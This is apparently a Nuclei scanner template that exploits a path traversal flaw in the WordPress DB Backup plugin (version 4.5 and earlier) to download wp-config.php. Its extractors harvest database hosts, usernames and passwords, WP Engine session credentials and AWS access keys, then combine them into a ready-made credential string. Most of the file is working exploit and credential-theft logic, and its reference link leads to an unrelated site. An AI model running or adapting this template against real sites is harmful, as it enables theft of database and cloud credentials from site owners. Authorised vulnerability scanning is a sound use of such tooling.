id: db-backup-lfi

info:
  name: DB Backup <= 4.5 - Path Traversal File Access
  author: 0x0xporn
  severity: high
  description: WordPress Plugin DB Backup is prone to a directory traversal vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive
    information that could aid in further attacks. WordPress Plugin DB Backup version 4.5 is vulnerable; prior versions may also be affected.
  reference: https://neal.fun/
  tags: wordpress,config,exposure,backup

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php'

    headers:
      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36

    matchers:
      - type: dsl
        dsl:
        - status_code==200 && contains(body,"WPENGINE_ACCOUNT")
        - status_code==200 && contains(body,"DB_PASSWORD")
        - status_code==200 && contains(body,"DB_PASS")
        - status_code==200 && contains(body,"PASSWD")
        - status_code==200 && contains(body,"db_pwd")
        - status_code==200 && contains(body,'/** MySQL database username */') && contains(body,'define(')        
        condition: or            

  #===EXTRACT-PART===#

    extractors:
      - type: regex
        part: body
        name: db_host        
        group: 6
        internal: true
        regex:
          - "define\\((.*?)['\"](.*?)(MYSQL|DB)_(HOST|HOSTNAME)['\"](.*?).*?['\"](.*?)['\"]"
      - type: regex
        part: body
        name: db_name        
        group: 6
        internal: true        
        regex:
          - "define\\((.*?)['\"](.*?)(MYSQL|DB)_(NAME|DATABASE)['\"](.*?).*?['\"](.*?)['\"]"          
      - type: regex
        part: body
        name: db_user        
        group: 6
        internal: true        
        regex:
          - "define\\((.*?)['\"](.*?)(MYSQL|DB)_(USER|USERNAME)['\"](.*?).*?['\"](.*?)['\"]"
      - type: regex
        part: body
        name: db_password        
        group: 6
        internal: true        
        regex:
          - "define\\((.*?)['\"](.*?)(MYSQL|DB)_(PASS|PASSWORD)['\"](.*?).*?['\"](.*?)['\"]"

      - type: regex
        part: body
        name: db_host
        group: 1  
        internal: true        
        regex:
          - "(?mi)['\"]WPENGINE_SESSION_DB_HOST\\s*['\"][=:]['\"]\\s*(.*?)\\,"
      - type: regex
        part: body
        name: db_user
        group: 1
        internal: true        
        regex:
          - "(?mi)['\"]WPENGINE_SESSION_DB_USERNAME\\s*['\"][=:]['\"]\\s*(.*?)\\,"
      - type: regex
        part: body
        name: db_password
        group: 1
        internal: true
        regex:   
          - "(?mi)['\"]WPENGINE_SESSION_DB_PASSWORD\\s*['\"][=:]['\"]\\s*(.*?)\\,"      

      - type: regex
        part: body
        name: aws_key
        regex:
          - "((A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16})"

      - type: regex
        part: body
        name: aws_key1
        regex:
          - (?i)(['\"]access-key-id['\"]\\s*=>\\s*['\"](AKIA[0-9A-Z]{16})['\"]|['\"]secret-access-key['\"]\\s*=>\\s*['\"]([A-Za-z0-9\/+]{40})['\"])
          
                 
      - type: dsl  # type of the extractor
        name: db_cred
        dsl:
          - '"DB_HOST=" + db_host + "|DB_PORT=" + "3306" + "|DB_USERNAME=" + db_user + "|DB_PASSWORD=" + db_password'

      - type: dsl
        name: db_original
        dsl:
          - '"DB_HOST=" + db_host + "|DB_PORT=" + db_port + "|DB_USERNAME=" +  db_user + "|DB_PASSWORD=" + db_password'